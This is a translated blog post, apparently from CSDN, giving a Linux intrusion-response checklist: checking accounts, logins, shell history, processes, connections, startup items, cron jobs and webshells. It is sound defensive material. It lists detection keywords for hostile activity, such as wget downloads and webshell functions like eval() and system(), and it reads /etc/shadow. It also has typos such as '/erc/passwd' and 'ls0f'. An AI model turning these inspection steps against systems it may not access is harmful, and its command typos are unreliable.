"Introduction to the author": CSDN top100, Alibaba Cloud blog expert, Huawei Cloud Sharing expert, and high-quality creators in the field
of network security
Recently, some fans have been asking me if I have been attacked by hackers, do I have to unplug the network cable? Is there any other way?
It stands to reason that if conditions permit, the network cable must be unplugged first to prevent lateral transmission.
But in many cases, it is not possible to unplug the network cable, such as cloud servers, and we cannot touch the network cable.
In fact, when encountering a hacker attack, there is not only one way to unplug the network cable. A hacker is also a human being. As long as he attacks, he will definitely leave clues.
Next, we will start from 7 directions, explain the analysis ideas, understand the attack path of hackers, and even countermeasures.
1. Account Analysis
/erc/passwd
The file stores user information.
/bin/bash indicates that the account status is available for login; /sbin/nologin indicates that the user status is not available for login.
/etc/group
File stores user group information
1. Check suspicious accounts
Focus on checking users whose id is greater than 1000 (new users will have an id greater than 1000, and all system users are less than 500).
awk -F: '($2=="")' /etc/shadow
Find the account with empty password
awk -F: '($3==0)' /etc/passwd
or grep "0:0" /etc/passwd
find the super privilege account with UID 0, make sure only root.
grep "/bin/bash" /etc/passwd
Find available accounts
2. Login status
who -b
last boot time
w
View the logged-in users (login time, login IP, and programs being executed).
lastb
View user failure information.
lastlog
View the last login information of all users.
last
View recent login information (including system power on and off)
3. Historical commands
history
View command history. ( will be history -c
cleared ).
/root/.bash_history
The file saves the history commands of root user
/home/user001/.bash_history
The file saves the history commands of ordinary users
The historical commands in history will be history -c
cleared , but the historical commands in the bash_history file need to be deleted to be cleared.
Focus on viewing suspicious historical commands, such as: wget (remote download), ssh (connect to the intranet), tar zip (compressed and packaged)
For reinstalling the SSH service with a backdoor (a built-in account, which is not displayed in the system), you can check the modification time or ssh -V
view the version.
2. Log Analysis
Linux system logs are placed by default in/var/log/
- /var/log/cron Scheduled task logs.
- /var/log/dmesg POST log (viewed by dmesg command).
- /var/log/maillog Mail log.
- /var/log/messages system log (when there is a problem with the system, focus on viewing this log).
- /var/log/secure Application login information and entered account password.
grep "Accepted" /var/log/secure
Filter logs for successful logins
grep "Failed" /var/log/secure
Filter logs for failed logins
/var/log/apache2/access.log
Apache access log
3. Process Analysis
Focus on those processes that will restart after the end, and analyze how it restarts according to the steps of the startup item.
1. Check the process
ps -ef
view all processes
ps -aux
View all processes, showing CPU and memory usage at the same time.
top
Check for processes with particularly high CPU usage (over 80%), which may be mining or business peaks.
kill -9 PID
End process by PID.
2. View the process execution file
ls0f -p 1546
Check the file opened by the process with PID 1546. The third line is the execution file corresponding to the process.
ll /proc/1546/exe
View the execution program corresponding to the process with PID 1546.
lsof -i:22
View the process corresponding to port 22.
4. Network connection
Check for suspicious network connections. Suspicious IPs, domain names, and suspicious files are sent to the threat intelligence platform for analysis.
1. View the status of the network link
netstat -anopt
Check the network connection status, LISTEN means listening status (waiting for connection); ESTABLISHED means open connection.
If the malicious IP is already known, you can filter to view the network connections communicating with the malicious IP netstat -anopt | grep 192.168.31.28
.
If you only know the malicious domain name, you can modify /etc/hosts
the file to redirect the malicious domain name to any other IP, and then filter the network connection communicating with this IP.
2. Threat intelligence analysis
The threat intelligence platform can query the credibility of domain names, IPs, and files, and if there are any traces of attack, it will be blocked immediately.
Qi Anxin Threat Intelligence: https://ti.qianxin.com/
Weibu Online: https://x.threatbook.com/
VirusTotal: https://www.virustotal.com/gui/home/upload
Anheng Threat Intelligence: https://ti.dbappsecurity.com.cn/
Sangfor Threat Intelligence: https://ti.sangfor.com.cn/analysis-platform
VenusEye Threat Intelligence: https://www.venuseye.com.cn/
360 Threat Intelligence:https://ti.360.net/#/homepage
5. Startup items
In order to prevent the controlled machine from losing contact, many malicious programs will put themselves in the startup items.
1. Boot file
Check whether there is any abnormal self-starting file, and pay attention to whether the content of the file has been tampered with or inserted malicious instructions.
1)/etc/rc.local
The last line is the script, executed during boot.
/etc/rc.local
It /etc/rc.d/rc.local
is a soft link, and the two files have the same effect.
2)/etc/init.d/
There are many startup scripts for system services in the directory, which are executed after the system starts (booting is completed).
/etc/init.d/
It /etc/rc.d/init.d/
is a soft link, and the two files have the same effect.
Ubuntu does not have /etc/rc.d/init.d
this directory. In order to maintain the uniformity of the same service used in CentOS and Ubuntu, all service scripts are placed /etc/init.d
in the directory.
3)/etc/rc*.d
Check whether the service startup script has been tampered with in other startup directories.
2. Boot command
systemctl list-unit-files
View service status
systemctl list-unit-files | grep firewalld
View specified service status
systemctl stop firewalld.service
Stop service
systemctl disable firewalld.service
Disable auto-start
Check the startup status of the service. Enabled means that it can be started automatically; disabled means that it cannot be started automatically.
Check whether the specified service starts automatically at boot, and disable auto start at boot.
3. Environment variable configuration file
These files are used to configure environment variables and start programs, and are triggered when the user is logged in at startup or switched users.
- /etc/bashrc
- /etc/profile
- ~/.bashrc
- ~/.bash_profile
6. Planning tasks
crontab -l
View scheduled tasks for the current user.
crontab -l -u root
View scheduled tasks for a specified user.
/etc/crontab
Save timed tasks
/etc/anacrontab
Save asynchronous timed tasks
/var/spool/cron/
The directory stores the timed tasks of each user.
/etc/cron.d
The directory stores the scheduled task files that need to be executed.
/etc/cron.hourly/
Hourly task Execute daily
/etc/cron.daily/
task
/etc/cron.weekly/
Weekly task
/etc/cron.monthly/
Execute monthly task
7. Sensitive directory files
Webshells usually contain malicious functions, such as:
- PHP:eval()、system()、assert()
- JSP:getRunTime()、FileOutputStream()
- ASP:eval()、execute()、ExecuteGlobal()
Look for suspicious files and check for such malicious functions in the file to determine if it is a webshell.
1. Recently modified files
find /root/ -ctime -2
Find the newly created files in the /root/ directory within two days.
find /root/ -mtime -2
Find files that have been modified within two days in the /root/ directory.
stat text.txt
View the detailed information of the file, focusing on access/modification/time.
ls -alt
Sort by file modification time
2. Sensitive directory
/tmp/ Temporary directory, ordinary users have read and write permissions to the files in the directory, usually used for privilege escalation.
/usr/bin/
/usr/sbin/
/etc/ssh/
Summarize:
Emergency response ideas can be roughly divided into three parts:
- find webshell
- Determine the attacking IP
- Retrace the attack operation and sort out the attack process.